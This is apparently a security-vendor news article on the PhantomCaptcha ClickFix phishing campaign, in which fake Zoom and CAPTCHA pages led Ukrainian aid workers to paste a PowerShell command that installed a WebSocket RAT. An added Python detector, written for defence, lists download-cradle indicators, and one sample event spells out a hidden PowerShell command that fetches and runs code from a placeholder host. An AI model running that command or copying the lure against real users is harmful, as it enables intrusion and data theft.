PhantomCaptcha ClickFix attack targets Ukraine war relief organizations
Farah Amod
November 05, 2025
A sophisticated one-day phishing campaign impersonated official Ukrainian channels to deliver spyware targeting humanitarian aid groups.
What happened
According to BleepingComputer, on October 8, 2025, a short but highly targeted phishing campaign aimed at members of Ukraine’s regional government and major humanitarian organizations such as the International Committee of the Red Cross and UNICEF. The operation, dubbed PhantomCaptcha, was designed to deploy a WebSocket-based Remote Access Trojan (RAT) through a novel ClickFix attack technique.
Sent via spear phishing emails spoofing the Ukrainian President’s Office, the attack used fake PDF invites that linked to a counterfeit Zoom domain. The attack infrastructure had been quietly built over months, with domains registered as early as March.
Going deeper
Once the link was clicked, victims were shown a fake browser verification page and, if their unique client ID matched, were redirected to a legitimate, password-protected Zoom meeting, likely to facilitate a live social engineering attempt.
If the client ID did not match, victims were served a fake Cloudflare CAPTCHA page in Ukrainian. They were instructed to copy a “verification token” into the Windows Command Prompt, unwittingly running a PowerShell command that downloaded a reconnaissance script.
The script gathered local system data and delivered a second-stage WebSocket RAT capable of executing remote commands and exfiltrating data using base64-encoded JSON. The campaign's infrastructure leveraged Russian hosting services, and researchers also observed follow-up spyware operations targeting Android users in Ukraine.
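Detection logic for the ClickFix chain described above, as an added example that is not code from the article or from the researchers: it scans constructed Sysmon-style process-creation events (JSON lines) and flags PowerShell launched from Explorer or an interactive cmd.exe with a download cradle or a hidden/encoded command line. Field names are Sysmon Event ID 1 names; the indicator list, sample events and placeholder URL are assumptions for illustration.

```python
"""Flag ClickFix-style process chains in Windows process-creation events.
The lure ends with the victim pasting a "verification token" into the Command
Prompt, so the telltale chain is Explorer or an interactive cmd.exe spawning
PowerShell with a download cradle or hidden/encoded invocation. Field names
follow Sysmon Event ID 1; every event below is constructed for this example."""

import json
import re
from pathlib import PureWindowsPath

# Command-line indicators that recur in ClickFix payloads (case-insensitive).
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Invoke-Expression|\bIEX\b|-e(?:nc|ncodedcommand)?\b"
    r"|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|ExecutionPolicy\s+bypass",
    re.IGNORECASE,
)
USER_PARENTS = {"explorer.exe", "cmd.exe"}   # where a pasted command starts
SHELLS = {"powershell.exe", "pwsh.exe"}       # what the pasted command runs


def is_clickfix_chain(event):
    """True when a user-facing parent launches PowerShell with cradle indicators."""
    if PureWindowsPath(event.get("Image", "")).name.lower() not in SHELLS:
        return False
    if PureWindowsPath(event.get("ParentImage", "")).name.lower() not in USER_PARENTS:
        return False
    return CRADLE.search(event.get("CommandLine", "")) is not None


def detect_clickfix(jsonl):
    """Return (ProcessId, first matched indicator) for each suspicious event."""
    hits = []
    for line in filter(str.strip, jsonl.splitlines()):
        event = json.loads(line)
        if is_clickfix_chain(event):
            hits.append((event["ProcessId"], CRADLE.search(event["CommandLine"]).group(0)))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample: one pasted ClickFix cradle, two benign PowerShell launches.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://placeholder.invalid/v')\""},
    {"ProcessId": 4188, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
    {"ProcessId": 4201, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -Command Get-ChildItem C:\Users"},
])
```

Running `detect_clickfix(SAMPLE_EVENTS)` flags only the first event; the same rule, pointed at real Sysmon or EDR telemetry, is a cheap tripwire for the pasted-command step that this campaign depends on.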
While SentinelOne stopped short of confirming attribution, Google’s Threat Intelligence Group recently linked similar “I am not a robot” CAPTCHA lures to ColdRiver, a Russian intelligence-affiliated threat group.
What was said
Researchers reported that the attackers showed a high level of preparation, registering domains months ahead of the attack and developing realistic lures. They noted that the use of live Zoom calls and localized language greatly increased the social engineering credibility of the campaign.
Google’s Threat Intelligence Group confirmed a broader trend of evolving “CAPTCHA-based” lures and attributed similar operations to ColdRiver, also known as Star Blizzard or Callisto, which is believed to be connected to Russia’s FSB.
The big picture
The PhantomCaptcha campaign shows how phishing threats are growing more personal and interactive. Attackers carefully mirrored trusted communication styles, used native language prompts, and even integrated fake Zoom redirects to make the experience believable. The campaign’s reliance on human action, requiring victims to manually execute commands, demonstrates how modern phishing has evolved beyond relying solely on malicious links or attachments to instead focus on convincing users to compromise their own security.
Paubox recommends Inbound Email Security to intercept these highly deceptive messages before they reach employees. Its generative AI evaluates tone, intent, and sender behavior to expose subtle inconsistencies that slip past rule-based filters, helping organizations prevent phishing emails that exploit trust rather than technology.
FAQs
What is a ClickFix attack, and how does it differ from typical phishing?
ClickFix attacks rely on tricking users into manually copying and pasting commands into their terminals, bypassing browser-based defenses and increasing the chances of payload delivery.
Why would a threat actor use a fake Zoom meeting as part of the attack?
A legitimate Zoom redirect creates a sense of trust and may enable attackers to interact with victims live, heightening the success of social engineering or gathering additional context.
What is a WebSocket RAT, and how is it used in attacks like this?
A WebSocket RAT (Remote Access Trojan) keeps a persistent, bidirectional WebSocket connection open to its command-and-control server, the same channel many legitimate web applications use, and uses it to receive commands and return stolen data, often in formats that blend in with normal traffic, such as base64-encoded JSON.
How are Android users being targeted in connection with this campaign?
Follow-up campaigns deployed malicious APKs disguised as adult content or cloud storage tools to harvest data like location, images, and call logs from mobile devices.
What’s the broader risk for aid organizations in conflict zones?
Organizations working in active war regions are likely targets for cyberespionage due to their access to politically and operationally sensitive data, making digital security as necessary as physical safety.